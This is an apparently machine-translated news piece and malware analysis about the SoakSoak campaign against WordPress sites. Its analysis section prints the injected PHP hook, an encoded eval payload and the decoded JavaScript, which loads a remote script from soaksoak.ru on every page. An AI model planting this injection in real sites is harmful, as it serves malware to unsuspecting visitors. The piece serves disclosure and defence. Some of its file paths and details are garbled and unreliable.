0.1 million WordPress website collapse: the malicious software SoakSoak has arrived

0.1 million WordPress website collapse: the malicious software SoakSoak has arrived

WoRdPress is a blog platform developed in PHP. You can set up your own blog and use WordPress as a content management system (CMS. WordPress security vulnerabilities have occurred frequently in recent months, includingFree theme hidden webshells that affect well-known CMS systems such as WordPress,WordPress versions earlier than 4.0 have the XSS Vulnerability.Now, a widely spread malware has infected more than 100,000 WordPress websites, and the number is still increasing.

Google blacklists over 11,000 domain names

The message was first sent to the WordPress community on Sunday morning because Google blacklisted more than 11,000 domain names. These websites were all attacked by the latest malware. The software came from SoakSoak.ru, so it is named SoakSoak malware. As more than 0.7 billion of the websites on the Internet use WordPress, Such malware has a huge impact.

Once infected, the website will experience abnormal behavior, including redirecting to SoakSoak.ru. Users accessing the website may also automatically download malicious programs. Google has blacklisted 11,000 websites that may be infected with viruses.
 

Malware Analysis

 

Malware SoakSoak modifies wp-prodes/template-loader.php files
 

 

<?phpfunction FuncQueueObject(){  wp_enqueue_script("swfobject");}add_action("wp_enqueue_scripts",'FuncQueueObject');

In this wayWp-nodes des/js/swobject. jsThe file is loaded on every page.Swobject. jsThe file contains the encrypted malicious js Code.
 

eval(decodeURIComponent ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Decrypted code:
 

eval(decodeURIComponent('(function(){    //var ua = navigator.userAgent.toLowerCase();    //if (ua.indexOf('chrome') != -1) return;    var head=document.getElementsByTagName('head')[0];    var script=document.createElement('script');    script.type='text/javascript';    script.src='http://soaksoak.ru/xteas/code';    script.id='xxyyzz_petushok';    head.appendChild(script);}());'));

 

Once the malicious code is decrypted, the JavaScript code in the SoakSoak.ru domain name will be loaded:Hxxp: // soaksoak.ru/xteas/code

Detection and Prevention

It is unclear how the virus infected the website. If you are using WordPress and you are worried that your website is infected, Sucuri provides a free website scan to check whether your website is infected with viruses.